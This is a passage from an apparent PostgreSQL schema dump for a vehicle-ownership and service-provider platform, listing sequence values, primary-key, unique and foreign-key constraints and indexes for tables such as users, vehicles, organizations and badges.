+-- + +SELECT pg_catalog.setval('data.service_providers_id_seq', 1, false); + + +-- +-- Name: service_specialties_id_seq; Type: SEQUENCE SET; Schema: data; Owner: kincses +-- + +SELECT pg_catalog.setval('data.service_specialties_id_seq', 9, true); + + +-- +-- Name: subscription_tiers_id_seq; Type: SEQUENCE SET; Schema: data; Owner: kincses +-- + +SELECT pg_catalog.setval('data.subscription_tiers_id_seq', 6, true); + + +-- +-- Name: translations_id_seq; Type: SEQUENCE SET; Schema: data; Owner: kincses +-- + +SELECT pg_catalog.setval('data.translations_id_seq', 1, false); + + +-- +-- Name: user_badges_id_seq; Type: SEQUENCE SET; Schema: data; Owner: kincses +-- + +SELECT pg_catalog.setval('data.user_badges_id_seq', 1, false); + + +-- +-- Name: user_scores_id_seq; Type: SEQUENCE SET; Schema: data; Owner: kincses +-- + +SELECT pg_catalog.setval('data.user_scores_id_seq', 1, false); + + +-- +-- Name: user_stats_id_seq; Type: SEQUENCE SET; Schema: data; Owner: kincses +-- + +SELECT pg_catalog.setval('data.user_stats_id_seq', 1, false); + + +-- +-- Name: user_vehicles_id_seq; Type: SEQUENCE SET; Schema: data; Owner: kincses +-- + +SELECT pg_catalog.setval('data.user_vehicles_id_seq', 1, false); + + +-- +-- Name: users_id_seq; Type: SEQUENCE SET; Schema: data; Owner: kincses +-- + +SELECT pg_catalog.setval('data.users_id_seq', 4, true); + + +-- +-- Name: vehicle_brands_id_seq; Type: SEQUENCE SET; Schema: data; Owner: kincses +-- + +SELECT pg_catalog.setval('data.vehicle_brands_id_seq', 149, true); + + +-- +-- Name: vehicle_categories_id_seq; Type: SEQUENCE SET; Schema: data; Owner: kincses +-- + +SELECT pg_catalog.setval('data.vehicle_categories_id_seq', 15, true); + + +-- +-- Name: vehicle_events_id_seq; Type: SEQUENCE SET; Schema: data; Owner: kincses +-- + +SELECT pg_catalog.setval('data.vehicle_events_id_seq', 1, false); + + +-- +-- Name: vehicle_models_id_seq; Type: SEQUENCE SET; Schema: data; Owner: kincses +-- + +SELECT pg_catalog.setval('data.vehicle_models_id_seq', 74, true); + + +-- +-- Name: vehicle_ownership_id_seq; Type: SEQUENCE SET; Schema: data; Owner: kincses +-- + +SELECT pg_catalog.setval('data.vehicle_ownership_id_seq', 6, true); + + +-- +-- Name: vehicle_variants_id_seq; Type: SEQUENCE SET; Schema: data; Owner: kincses +-- + +SELECT pg_catalog.setval('data.vehicle_variants_id_seq', 1, false); + + +-- +-- Name: vehicles_id_seq; Type: SEQUENCE SET; Schema: data; Owner: kincses +-- + +SELECT pg_catalog.setval('data.vehicles_id_seq', 8, true); + + +-- +-- Name: verification_tokens_id_seq; Type: SEQUENCE SET; Schema: data; Owner: kincses +-- + +SELECT pg_catalog.setval('data.verification_tokens_id_seq', 4, true); + + +-- +-- Name: votes_id_seq; Type: SEQUENCE SET; Schema: data; Owner: kincses +-- + +SELECT pg_catalog.setval('data.votes_id_seq', 1, false); + + +-- +-- Name: audit_logs audit_logs_pkey; Type: CONSTRAINT; Schema: data; Owner: kincses +-- + +ALTER TABLE ONLY data.audit_logs + ADD CONSTRAINT audit_logs_pkey PRIMARY KEY (id); + + +-- +-- Name: badges badges_name_key; Type: CONSTRAINT; Schema: data; Owner: kincses +-- + +ALTER TABLE ONLY data.badges + ADD CONSTRAINT badges_name_key UNIQUE (name); + + +-- +-- Name: badges badges_pkey; Type: CONSTRAINT; Schema: data; Owner: kincses +-- + +ALTER TABLE ONLY data.badges + ADD CONSTRAINT badges_pkey PRIMARY KEY (id); + + +-- +-- Name: companies companies_pkey; Type: CONSTRAINT; Schema: data; Owner: kincses +-- + +ALTER TABLE ONLY data.companies + ADD CONSTRAINT companies_pkey PRIMARY KEY (id); + + +-- +-- Name: company_members company_members_pkey; Type: CONSTRAINT; Schema: data; Owner: kincses +-- + +ALTER TABLE ONLY data.company_members + ADD CONSTRAINT company_members_pkey PRIMARY KEY (id); + + +-- +-- Name: competitions competitions_pkey; Type: CONSTRAINT; Schema: data; Owner: kincses +-- + +ALTER TABLE ONLY data.competitions + ADD CONSTRAINT competitions_pkey PRIMARY KEY (id); + + +-- +-- Name: credit_logs credit_logs_pkey; Type: CONSTRAINT; Schema: data; Owner: kincses +-- + +ALTER TABLE ONLY data.credit_logs + ADD CONSTRAINT credit_logs_pkey PRIMARY KEY (id); + + +-- +-- Name: email_logs email_logs_pkey; Type: CONSTRAINT; Schema: data; Owner: kincses +-- + +ALTER TABLE ONLY data.email_logs + ADD CONSTRAINT email_logs_pkey PRIMARY KEY (id); + + +-- +-- Name: email_provider_configs email_provider_configs_name_key; Type: CONSTRAINT; Schema: data; Owner: kincses +-- + +ALTER TABLE ONLY data.email_provider_configs + ADD CONSTRAINT email_provider_configs_name_key UNIQUE (name); + + +-- +-- Name: email_provider_configs email_provider_configs_pkey; Type: CONSTRAINT; Schema: data; Owner: kincses +-- + +ALTER TABLE ONLY data.email_provider_configs + ADD CONSTRAINT email_provider_configs_pkey PRIMARY KEY (id); + + +-- +-- Name: email_providers email_providers_pkey; Type: CONSTRAINT; Schema: data; Owner: kincses +-- + +ALTER TABLE ONLY data.email_providers + ADD CONSTRAINT email_providers_pkey PRIMARY KEY (id); + + +-- +-- Name: email_templates email_templates_pkey; Type: CONSTRAINT; Schema: data; Owner: kincses +-- + +ALTER TABLE ONLY data.email_templates + ADD CONSTRAINT email_templates_pkey PRIMARY KEY (id); + + +-- +-- Name: legal_acceptances legal_acceptances_pkey; Type: CONSTRAINT; Schema: data; Owner: kincses +-- + +ALTER TABLE ONLY data.legal_acceptances + ADD CONSTRAINT legal_acceptances_pkey PRIMARY KEY (id); + + +-- +-- Name: legal_documents legal_documents_pkey; Type: CONSTRAINT; Schema: data; Owner: kincses +-- + +ALTER TABLE ONLY data.legal_documents + ADD CONSTRAINT legal_documents_pkey PRIMARY KEY (id); + + +-- +-- Name: level_configs level_configs_level_number_key; Type: CONSTRAINT; Schema: data; Owner: kincses +-- + +ALTER TABLE ONLY data.level_configs + ADD CONSTRAINT level_configs_level_number_key UNIQUE (level_number); + + +-- +-- Name: level_configs level_configs_pkey; Type: CONSTRAINT; Schema: data; Owner: kincses +-- + +ALTER TABLE ONLY data.level_configs + ADD CONSTRAINT level_configs_pkey PRIMARY KEY (id); + + +-- +-- Name: locations locations_pkey; Type: CONSTRAINT; Schema: data; Owner: kincses +-- + +ALTER TABLE ONLY data.locations + ADD CONSTRAINT locations_pkey PRIMARY KEY (id); + + +-- +-- Name: org_subscriptions org_subscriptions_pkey; Type: CONSTRAINT; Schema: data; Owner: kincses +-- + +ALTER TABLE ONLY data.org_subscriptions + ADD CONSTRAINT org_subscriptions_pkey PRIMARY KEY (id); + + +-- +-- Name: organization_locations organization_locations_pkey; Type: CONSTRAINT; Schema: data; Owner: kincses +-- + +ALTER TABLE ONLY data.organization_locations + ADD CONSTRAINT organization_locations_pkey PRIMARY KEY (id); + + +-- +-- Name: organization_members organization_members_pkey; Type: CONSTRAINT; Schema: data; Owner: kincses +-- + +ALTER TABLE ONLY data.organization_members + ADD CONSTRAINT organization_members_pkey PRIMARY KEY (id); + + +-- +-- Name: organizations organizations_pkey; Type: CONSTRAINT; Schema: data; Owner: kincses +-- + +ALTER TABLE ONLY data.organizations + ADD CONSTRAINT organizations_pkey PRIMARY KEY (id); + + +-- +-- Name: point_rules point_rules_pkey; Type: CONSTRAINT; Schema: data; Owner: kincses +-- + +ALTER TABLE ONLY data.point_rules + ADD CONSTRAINT point_rules_pkey PRIMARY KEY (id); + + +-- +-- Name: points_ledger points_ledger_pkey; Type: CONSTRAINT; Schema: data; Owner: kincses +-- + +ALTER TABLE ONLY data.points_ledger + ADD CONSTRAINT points_ledger_pkey PRIMARY KEY (id); + + +-- +-- Name: regional_settings regional_settings_country_code_key; Type: CONSTRAINT; Schema: data; Owner: kincses +-- + +ALTER TABLE ONLY data.regional_settings + ADD CONSTRAINT regional_settings_country_code_key UNIQUE (country_code); + + +-- +-- Name: regional_settings regional_settings_pkey; Type: CONSTRAINT; Schema: data; Owner: kincses +-- + +ALTER TABLE ONLY data.regional_settings + ADD CONSTRAINT regional_settings_pkey PRIMARY KEY (id); + + +-- +-- Name: service_providers service_providers_pkey; Type: CONSTRAINT; Schema: data; Owner: kincses +-- + +ALTER TABLE ONLY data.service_providers + ADD CONSTRAINT service_providers_pkey PRIMARY KEY (id); + + +-- +-- Name: service_specialties service_specialties_pkey; Type: CONSTRAINT; Schema: data; Owner: kincses +-- + +ALTER TABLE ONLY data.service_specialties + ADD CONSTRAINT service_specialties_pkey PRIMARY KEY (id); + + +-- +-- Name: service_specialties service_specialties_slug_key; Type: CONSTRAINT; Schema: data; Owner: kincses +-- + +ALTER TABLE ONLY data.service_specialties + ADD CONSTRAINT service_specialties_slug_key UNIQUE (slug); + + +-- +-- Name: subscription_tiers subscription_tiers_name_key; Type: CONSTRAINT; Schema: data; Owner: kincses +-- + +ALTER TABLE ONLY data.subscription_tiers + ADD CONSTRAINT subscription_tiers_name_key UNIQUE (name); + + +-- +-- Name: subscription_tiers subscription_tiers_pkey; Type: CONSTRAINT; Schema: data; Owner: kincses +-- + +ALTER TABLE ONLY data.subscription_tiers + ADD CONSTRAINT subscription_tiers_pkey PRIMARY KEY (id); + + +-- +-- Name: system_settings system_settings_pkey; Type: CONSTRAINT; Schema: data; Owner: kincses +-- + +ALTER TABLE ONLY data.system_settings + ADD CONSTRAINT system_settings_pkey PRIMARY KEY (key_name); + + +-- +-- Name: translations translations_pkey; Type: CONSTRAINT; Schema: data; Owner: kincses +-- + +ALTER TABLE ONLY data.translations + ADD CONSTRAINT translations_pkey PRIMARY KEY (id); + + +-- +-- Name: vehicles uni_vin; Type: CONSTRAINT; Schema: data; Owner: kincses +-- + +ALTER TABLE ONLY data.vehicles + ADD CONSTRAINT uni_vin UNIQUE (vin); + + +-- +-- Name: email_providers unique_provider_name; Type: CONSTRAINT; Schema: data; Owner: kincses +-- + +ALTER TABLE ONLY data.email_providers + ADD CONSTRAINT unique_provider_name UNIQUE (name); + + +-- +-- Name: organization_members unique_user_org; Type: CONSTRAINT; Schema: data; Owner: kincses +-- + +ALTER TABLE ONLY data.organization_members + ADD CONSTRAINT unique_user_org UNIQUE (organization_id, user_id); + + +-- +-- Name: translations uq_translation_key_lang; Type: CONSTRAINT; Schema: data; Owner: kincses +-- + +ALTER TABLE ONLY data.translations + ADD CONSTRAINT uq_translation_key_lang UNIQUE (key, lang_code); + + +-- +-- Name: user_scores uq_user_competition_score; Type: CONSTRAINT; Schema: data; Owner: kincses +-- + +ALTER TABLE ONLY data.user_scores + ADD CONSTRAINT uq_user_competition_score UNIQUE (user_id, competition_id); + + +-- +-- Name: votes uq_user_provider_vote; Type: CONSTRAINT; Schema: data; Owner: kincses +-- + +ALTER TABLE ONLY data.votes + ADD CONSTRAINT uq_user_provider_vote UNIQUE (user_id, provider_id); + + +-- +-- Name: user_badges user_badges_pkey; Type: CONSTRAINT; Schema: data; Owner: kincses +-- + +ALTER TABLE ONLY data.user_badges + ADD CONSTRAINT user_badges_pkey PRIMARY KEY (id); + + +-- +-- Name: user_scores user_scores_pkey; Type: CONSTRAINT; Schema: data; Owner: kincses +-- + +ALTER TABLE ONLY data.user_scores + ADD CONSTRAINT user_scores_pkey PRIMARY KEY (id); + + +-- +-- Name: user_stats user_stats_pkey; Type: CONSTRAINT; Schema: data; Owner: kincses +-- + +ALTER TABLE ONLY data.user_stats + ADD CONSTRAINT user_stats_pkey PRIMARY KEY (id); + + +-- +-- Name: user_stats user_stats_user_id_key; Type: CONSTRAINT; Schema: data; Owner: kincses +-- + +ALTER TABLE ONLY data.user_stats + ADD CONSTRAINT user_stats_user_id_key UNIQUE (user_id); + + +-- +-- Name: user_vehicles user_vehicles_pkey; Type: CONSTRAINT; Schema: data; Owner: kincses +-- + +ALTER TABLE ONLY data.user_vehicles + ADD CONSTRAINT user_vehicles_pkey PRIMARY KEY (id); + + +-- +-- Name: users users_pkey; Type: CONSTRAINT; Schema: data; Owner: kincses +-- + +ALTER TABLE ONLY data.users + ADD CONSTRAINT users_pkey PRIMARY KEY (id); + + +-- +-- Name: vehicle_brands vehicle_brands_cat_name_key; Type: CONSTRAINT; Schema: data; Owner: kincses +-- + +ALTER TABLE ONLY data.vehicle_brands + ADD CONSTRAINT vehicle_brands_cat_name_key UNIQUE (category_id, name); + + +-- +-- Name: vehicle_brands vehicle_brands_name_key; Type: CONSTRAINT; Schema: data; Owner: kincses +-- + +ALTER TABLE ONLY data.vehicle_brands + ADD CONSTRAINT vehicle_brands_name_key UNIQUE (name); + + +-- +-- Name: vehicle_brands vehicle_brands_pkey; Type: CONSTRAINT; Schema: data; Owner: kincses +-- + +ALTER TABLE ONLY data.vehicle_brands + ADD CONSTRAINT vehicle_brands_pkey PRIMARY KEY (id); + + +-- +-- Name: vehicle_categories vehicle_categories_name_key; Type: CONSTRAINT; Schema: data; Owner: kincses +-- + +ALTER TABLE ONLY data.vehicle_categories + ADD CONSTRAINT vehicle_categories_name_key UNIQUE (name); + + +-- +-- Name: vehicle_categories vehicle_categories_pkey; Type: CONSTRAINT; Schema: data; Owner: kincses +-- + +ALTER TABLE ONLY data.vehicle_categories + ADD CONSTRAINT vehicle_categories_pkey PRIMARY KEY (id); + + +-- +-- Name: vehicle_events vehicle_events_pkey; Type: CONSTRAINT; Schema: data; Owner: kincses +-- + +ALTER TABLE ONLY data.vehicle_events + ADD CONSTRAINT vehicle_events_pkey PRIMARY KEY (id); + + +-- +-- Name: vehicle_models vehicle_models_brand_name_key; Type: CONSTRAINT; Schema: data; Owner: kincses +-- + +ALTER TABLE ONLY data.vehicle_models + ADD CONSTRAINT vehicle_models_brand_name_key UNIQUE (brand_id, name); + + +-- +-- Name: vehicle_models vehicle_models_pkey; Type: CONSTRAINT; Schema: data; Owner: kincses +-- + +ALTER TABLE ONLY data.vehicle_models + ADD CONSTRAINT vehicle_models_pkey PRIMARY KEY (id); + + +-- +-- Name: vehicle_ownership vehicle_ownership_pkey; Type: CONSTRAINT; Schema: data; Owner: kincses +-- + +ALTER TABLE ONLY data.vehicle_ownership + ADD CONSTRAINT vehicle_ownership_pkey PRIMARY KEY (id); + + +-- +-- Name: vehicle_variants vehicle_variants_pkey; Type: CONSTRAINT; Schema: data; Owner: kincses +-- + +ALTER TABLE ONLY data.vehicle_variants + ADD CONSTRAINT vehicle_variants_pkey PRIMARY KEY (id); + + +-- +-- Name: vehicles vehicles_pkey; Type: CONSTRAINT; Schema: data; Owner: kincses +-- + +ALTER TABLE ONLY data.vehicles + ADD CONSTRAINT vehicles_pkey PRIMARY KEY (id); + + +-- +-- Name: verification_tokens verification_tokens_pkey; Type: CONSTRAINT; Schema: data; Owner: kincses +-- + +ALTER TABLE ONLY data.verification_tokens + ADD CONSTRAINT verification_tokens_pkey PRIMARY KEY (id); + + +-- +-- Name: votes votes_pkey; Type: CONSTRAINT; Schema: data; Owner: kincses +-- + +ALTER TABLE ONLY data.votes + ADD CONSTRAINT votes_pkey PRIMARY KEY (id); + + +-- +-- Name: alembic_version alembic_version_pkc; Type: CONSTRAINT; Schema: public; Owner: kincses +-- + +ALTER TABLE ONLY public.alembic_version + ADD CONSTRAINT alembic_version_pkc PRIMARY KEY (version_num); + + +-- +-- Name: idx_org_slug; Type: INDEX; Schema: data; Owner: kincses +-- + +CREATE UNIQUE INDEX idx_org_slug ON data.organizations USING btree (slug); + + +-- +-- Name: idx_settings_lookup; Type: INDEX; Schema: data; Owner: kincses +-- + +CREATE UNIQUE INDEX idx_settings_lookup ON data.system_settings USING btree (key_name, COALESCE(region_code, ''::character varying), COALESCE(tier_id, 0), COALESCE(org_id, 0)); + + +-- +-- Name: idx_vb_slug; Type: INDEX; Schema: data; Owner: kincses +-- + +CREATE UNIQUE INDEX idx_vb_slug ON data.vehicle_brands USING btree (slug); + + +-- +-- Name: idx_vc_slug; Type: INDEX; Schema: data; Owner: kincses +-- + +CREATE UNIQUE INDEX idx_vc_slug ON data.vehicle_categories USING btree (slug); + + +-- +-- Name: idx_vm_slug; Type: INDEX; Schema: data; Owner: kincses +-- + +CREATE UNIQUE INDEX idx_vm_slug ON data.vehicle_models USING btree (brand_id, slug); + + +-- +-- Name: ix_data_badges_id; Type: INDEX; Schema: data; Owner: kincses +-- + +CREATE INDEX ix_data_badges_id ON data.badges USING btree (id); + + +-- +-- Name: ix_data_email_logs_email; Type: INDEX; Schema: data; Owner: kincses +-- + +CREATE INDEX ix_data_email_logs_email ON data.email_logs USING btree (email); + + +-- +-- Name: ix_data_email_logs_id; Type: INDEX; Schema: data; Owner: kincses +-- + +CREATE INDEX ix_data_email_logs_id ON data.email_logs USING btree (id); + + +-- +-- Name: ix_data_email_provider_configs_id; Type: INDEX; Schema: data; Owner: kincses +-- + +CREATE INDEX ix_data_email_provider_configs_id ON data.email_provider_configs USING btree (id); + + +-- +-- Name: ix_data_email_templates_id; Type: INDEX; Schema: data; Owner: kincses +-- + +CREATE INDEX ix_data_email_templates_id ON data.email_templates USING btree (id); + + +-- +-- Name: ix_data_email_templates_type; Type: INDEX; Schema: data; Owner: kincses +-- + +CREATE UNIQUE INDEX ix_data_email_templates_type ON data.email_templates USING btree (type); + + +-- +-- Name: ix_data_legal_acceptances_id; Type: INDEX; Schema: data; Owner: kincses +-- + +CREATE INDEX ix_data_legal_acceptances_id ON data.legal_acceptances USING btree (id); + + +-- +-- Name: ix_data_legal_documents_id; Type: INDEX; Schema: data; Owner: kincses +-- + +CREATE INDEX ix_data_legal_documents_id ON data.legal_documents USING btree (id); + + +-- +-- Name: ix_data_level_configs_id; Type: INDEX; Schema: data; Owner: kincses +-- + +CREATE INDEX ix_data_level_configs_id ON data.level_configs USING btree (id); + + +-- +-- Name: ix_data_organization_members_id; Type: INDEX; Schema: data; Owner: kincses +-- + +CREATE INDEX ix_data_organization_members_id ON data.organization_members USING btree (id); + + +-- +-- Name: ix_data_organizations_id; Type: INDEX; Schema: data; Owner: kincses +-- + +CREATE INDEX ix_data_organizations_id ON data.organizations USING btree (id); + + +-- +-- Name: ix_data_organizations_tax_number; Type: INDEX; Schema: data; Owner: kincses +-- + +CREATE INDEX ix_data_organizations_tax_number ON data.organizations USING btree (tax_number); + + +-- +-- Name: ix_data_point_rules_action_key; Type: INDEX; Schema: data; Owner: kincses +-- + +CREATE UNIQUE INDEX ix_data_point_rules_action_key ON data.point_rules USING btree (action_key); + + +-- +-- Name: ix_data_point_rules_id; Type: INDEX; Schema: data; Owner: kincses +-- + +CREATE INDEX ix_data_point_rules_id ON data.point_rules USING btree (id); + + +-- +-- Name: ix_data_points_ledger_id; Type: INDEX; Schema: data; Owner: kincses +-- + +CREATE INDEX ix_data_points_ledger_id ON data.points_ledger USING btree (id); + + +-- +-- Name: ix_data_regional_settings_id; Type: INDEX; Schema: data; Owner: kincses +-- + +CREATE INDEX ix_data_regional_settings_id ON data.regional_settings USING btree (id); + + +-- +-- Name: ix_data_service_providers_id; Type: INDEX; Schema: data; Owner: kincses +-- + +CREATE INDEX ix_data_service_providers_id ON data.service_providers USING btree (id); + + +-- +-- Name: ix_data_system_settings_key; Type: INDEX; Schema: data; Owner: kincses +-- + +CREATE INDEX ix_data_system_settings_key ON data.system_settings USING btree (key_name); + + +-- +-- Name: ix_data_translations_id; Type: INDEX; Schema: data; Owner: kincses +-- + +CREATE INDEX ix_data_translations_id ON data.translations USING btree (id); + + +-- +-- Name: ix_data_translations_key; Type: INDEX; Schema: data; Owner: kincses +-- + +CREATE INDEX ix_data_translations_key ON data.translations USING btree (key); + + +-- +-- Name: ix_data_translations_lang_code; Type: INDEX; Schema: data; Owner: kincses +-- + +CREATE INDEX ix_data_translations_lang_code ON data.translations USING btree (lang_code); + + +-- +-- Name: ix_data_user_badges_id; Type: INDEX; Schema: data; Owner: kincses +-- + +CREATE INDEX ix_data_user_badges_id ON data.user_badges USING btree (id); + + +-- +-- Name: ix_data_user_stats_id; Type: INDEX; Schema: data; Owner: kincses +-- + +CREATE INDEX ix_data_user_stats_id ON data.user_stats USING btree (id); + + +-- +-- Name: ix_data_user_vehicles_id; Type: INDEX; Schema: data; Owner: kincses +-- + +CREATE INDEX ix_data_user_vehicles_id ON data.user_vehicles USING btree (id); + + +-- +-- Name: ix_data_user_vehicles_license_plate; Type: INDEX; Schema: data; Owner: kincses +-- + +CREATE INDEX ix_data_user_vehicles_license_plate ON data.user_vehicles USING btree (license_plate); + + +-- +-- Name: ix_data_user_vehicles_vin; Type: INDEX; Schema: data; Owner: kincses +-- + +CREATE UNIQUE INDEX ix_data_user_vehicles_vin ON data.user_vehicles USING btree (vin); + + +-- +-- Name: ix_data_users_email; Type: INDEX; Schema: data; Owner: kincses +-- + +CREATE UNIQUE INDEX ix_data_users_email ON data.users USING btree (email); + + +-- +-- Name: ix_data_users_id; Type: INDEX; Schema: data; Owner: kincses +-- + +CREATE INDEX ix_data_users_id ON data.users USING btree (id); + + +-- +-- Name: ix_data_vehicle_brands_id; Type: INDEX; Schema: data; Owner: kincses +-- + +CREATE INDEX ix_data_vehicle_brands_id ON data.vehicle_brands USING btree (id); + + +-- +-- Name: ix_data_vehicle_categories_id; Type: INDEX; Schema: data; Owner: kincses +-- + +CREATE INDEX ix_data_vehicle_categories_id ON data.vehicle_categories USING btree (id); + + +-- +-- Name: ix_data_vehicle_models_id; Type: INDEX; Schema: data; Owner: kincses +-- + +CREATE INDEX ix_data_vehicle_models_id ON data.vehicle_models USING btree (id); + + +-- +-- Name: ix_data_vehicle_ownership_id; Type: INDEX; Schema: data; Owner: kincses +-- + +CREATE INDEX ix_data_vehicle_ownership_id ON data.vehicle_ownership USING btree (id); + + +-- +-- Name: ix_data_vehicle_variants_id; Type: INDEX; Schema: data; Owner: kincses +-- + +CREATE INDEX ix_data_vehicle_variants_id ON data.vehicle_variants USING btree (id); + + +-- +-- Name: ix_data_verification_tokens_id; Type: INDEX; Schema: data; Owner: kincses +-- + +CREATE INDEX ix_data_verification_tokens_id ON data.verification_tokens USING btree (id); + + +-- +-- Name: ix_data_verification_tokens_token; Type: INDEX; Schema: data; Owner: kincses +-- + +CREATE UNIQUE INDEX ix_data_verification_tokens_token ON data.verification_tokens USING btree (token); + + +-- +-- Name: audit_logs audit_logs_user_id_fkey; Type: FK CONSTRAINT; Schema: data; Owner: kincses +-- + +ALTER TABLE ONLY data.audit_logs + ADD CONSTRAINT audit_logs_user_id_fkey FOREIGN KEY (user_id) REFERENCES data.users(id); + + +-- +-- Name: companies companies_owner_id_fkey; Type: FK CONSTRAINT; Schema: data; Owner: kincses +-- + +ALTER TABLE ONLY data.companies + ADD CONSTRAINT companies_owner_id_fkey FOREIGN KEY (owner_id) REFERENCES data.users(id); + + +-- +-- Name: company_members company_members_company_id_fkey; Type: FK CONSTRAINT; Schema: data; Owner: kincses +-- + +ALTER TABLE ONLY data.company_members + ADD CONSTRAINT company_members_company_id_fkey FOREIGN KEY (company_id) REFERENCES data.companies(id) ON DELETE CASCADE; + + +-- +-- Name: company_members company_members_user_id_fkey; Type: FK CONSTRAINT; Schema: data; Owner: kincses +-- + +ALTER TABLE ONLY data.company_members + ADD CONSTRAINT company_members_user_id_fkey FOREIGN KEY (user_id) REFERENCES data.users(id) ON DELETE CASCADE; + + +-- +-- Name: credit_logs credit_logs_org_id_fkey; Type: FK CONSTRAINT; Schema: data; Owner: kincses +-- + +ALTER TABLE ONLY data.credit_logs + ADD CONSTRAINT credit_logs_org_id_fkey FOREIGN KEY (org_id) REFERENCES data.organizations(id); + + +-- +-- Name: legal_acceptances legal_acceptances_document_id_fkey; Type: FK CONSTRAINT; Schema: data; Owner: kincses +-- + +ALTER TABLE ONLY data.legal_acceptances + ADD CONSTRAINT legal_acceptances_document_id_fkey FOREIGN KEY (document_id) REFERENCES data.legal_documents(id); + + +-- +-- Name: legal_acceptances legal_acceptances_user_id_fkey; Type: FK CONSTRAINT; Schema: data; Owner: kincses +-- + +ALTER TABLE ONLY data.legal_acceptances + ADD CONSTRAINT legal_acceptances_user_id_fkey FOREIGN KEY (user_id) REFERENCES data.users(id); + + +-- +-- Name: org_subscriptions org_subscriptions_org_id_fkey; Type: FK CONSTRAINT; Schema: data; Owner: kincses +-- + +ALTER TABLE ONLY data.org_subscriptions + ADD CONSTRAINT org_subscriptions_org_id_fkey FOREIGN KEY (org_id) REFERENCES data.organizations(id); + + +-- +-- Name: org_subscriptions org_subscriptions_tier_id_fkey; Type: FK CONSTRAINT; Schema: data; Owner: kincses +-- + +ALTER TABLE ONLY data.org_subscriptions + ADD CONSTRAINT org_subscriptions_tier_id_fkey FOREIGN KEY (tier_id) REFERENCES data.subscription_tiers(id); + + +-- +-- Name: organization_locations organization_locations_organization_id_fkey; Type: FK CONSTRAINT; Schema: data; Owner: kincses +-- + +ALTER TABLE ONLY data.organization_locations + ADD CONSTRAINT organization_locations_organization_id_fkey FOREIGN KEY (organization_id) REFERENCES data.organizations(id) ON DELETE CASCADE; + + +-- +-- Name: organization_members organization_members_org_id_fkey; Type: FK CONSTRAINT; Schema: data; Owner: kincses +-- + +ALTER TABLE ONLY data.organization_members + ADD CONSTRAINT organization_members_org_id_fkey FOREIGN KEY (organization_id) REFERENCES data.organizations(id) ON DELETE CASCADE; + + +-- +-- Name: organization_members organization_members_user_id_fkey; Type: FK CONSTRAINT; Schema: data; Owner: kincses +-- + +ALTER TABLE ONLY data.organization_members + ADD CONSTRAINT organization_members_user_id_fkey FOREIGN KEY (user_id) REFERENCES data.users(id) ON DELETE CASCADE; + + +-- +-- Name: organizations organizations_owner_id_fkey; Type: FK CONSTRAINT; Schema: data; Owner: kincses +-- + +ALTER TABLE ONLY data.organizations + ADD CONSTRAINT organizations_owner_id_fkey FOREIGN KEY (owner_id) REFERENCES data.users(id); + + +-- +-- Name: points_ledger points_ledger_user_id_fkey; Type: FK CONSTRAINT; Schema: data; Owner: kincses +-- + +ALTER TABLE ONLY data.points_ledger + ADD CONSTRAINT points_ledger_user_id_fkey FOREIGN KEY (user_id) REFERENCES data.users(id); + + +-- +-- Name: service_providers service_providers_added_by_user_id_fkey; Type: FK CONSTRAINT; Schema: data; Owner: kincses +-- + +ALTER TABLE ONLY data.service_providers + ADD CONSTRAINT service_providers_added_by_user_id_fkey FOREIGN KEY (added_by_user_id) REFERENCES data.users(id); + + +-- +-- Name: service_specialties service_specialties_parent_id_fkey; Type: FK CONSTRAINT; Schema: data; Owner: kincses +-- + +ALTER TABLE ONLY data.service_specialties + ADD CONSTRAINT service_specialties_parent_id_fkey FOREIGN KEY (parent_id) REFERENCES data.service_specialties(id); + + +-- +-- Name: user_badges user_badges_badge_id_fkey; Type: FK CONSTRAINT; Schema: data; Owner: kincses +-- + +ALTER TABLE ONLY data.user_badges + ADD CONSTRAINT user_badges_badge_id_fkey FOREIGN KEY (badge_id) REFERENCES data.badges(id); + + +-- +-- Name: user_badges user_badges_user_id_fkey; Type: FK CONSTRAINT; Schema: data; Owner: kincses +-- + +ALTER TABLE ONLY data.user_badges + ADD CONSTRAINT user_badges_user_id_fkey FOREIGN KEY (user_id) REFERENCES data.users(id); + + +-- +-- Name: user_scores user_scores_competition_id_fkey; Type: FK CONSTRAINT; Schema: data; Owner: kincses +-- + +ALTER TABLE ONLY data.user_scores + ADD CONSTRAINT user_scores_competition_id_fkey FOREIGN KEY (competition_id) REFERENCES data.competitions(id); + + +-- +-- Name: user_scores user_scores_user_id_fkey; Type: FK CONSTRAINT; Schema: data; Owner: kincses +-- + +ALTER TABLE ONLY data.user_scores + ADD CONSTRAINT user_scores_user_id_fkey FOREIGN KEY (user_id) REFERENCES data.users(id); + + +-- +-- Name: user_stats user_stats_user_id_fkey; Type: FK CONSTRAINT; Schema: data; Owner: kincses +-- + +ALTER TABLE ONLY data.user_stats + ADD CONSTRAINT user_stats_user_id_fkey FOREIGN KEY (user_id) REFERENCES data.users(id); + + +-- +-- Name: user_vehicles user_vehicles_current_org_id_fkey; Type: FK CONSTRAINT; Schema: data; Owner: kincses +-- + +ALTER TABLE ONLY data.user_vehicles + ADD CONSTRAINT user_vehicles_current_org_id_fkey FOREIGN KEY (current_org_id) REFERENCES data.organizations(id); + + +-- +-- Name: user_vehicles user_vehicles_variant_id_fkey; Type: FK CONSTRAINT; Schema: data; Owner: kincses +-- + +ALTER TABLE ONLY data.user_vehicles + ADD CONSTRAINT user_vehicles_variant_id_fkey FOREIGN KEY (variant_id) REFERENCES data.vehicle_variants(id); + + +-- +-- Name: vehicle_brands vehicle_brands_category_id_fkey; Type: FK CONSTRAINT; Schema: data; Owner: kincses +-- + +ALTER TABLE ONLY data.vehicle_brands + ADD CONSTRAINT vehicle_brands_category_id_fkey FOREIGN KEY (category_id) REFERENCES data.vehicle_categories(id); + + +-- +-- Name: vehicle_events vehicle_events_service_provider_id_fkey; Type: FK CONSTRAINT; Schema: data; Owner: kincses +-- + +ALTER TABLE ONLY data.vehicle_events + ADD CONSTRAINT vehicle_events_service_provider_id_fkey FOREIGN KEY (service_provider_id) REFERENCES data.service_providers(id); + + +-- +-- Name: vehicle_events vehicle_events_vehicle_id_fkey; Type: FK CONSTRAINT; Schema: data; Owner: kincses +-- + +ALTER TABLE ONLY data.vehicle_events + ADD CONSTRAINT vehicle_events_vehicle_id_fkey FOREIGN KEY (vehicle_id) REFERENCES data.user_vehicles(id) ON DELETE CASCADE; + + +-- +-- Name: vehicle_models vehicle_models_brand_id_fkey; Type: FK CONSTRAINT; Schema: data; Owner: kincses +-- + +ALTER TABLE ONLY data.vehicle_models + ADD CONSTRAINT vehicle_models_brand_id_fkey FOREIGN KEY (brand_id) REFERENCES data.vehicle_brands(id); + + +-- +-- Name: vehicle_models vehicle_models_category_id_fkey; Type: FK CONSTRAINT; Schema: data; 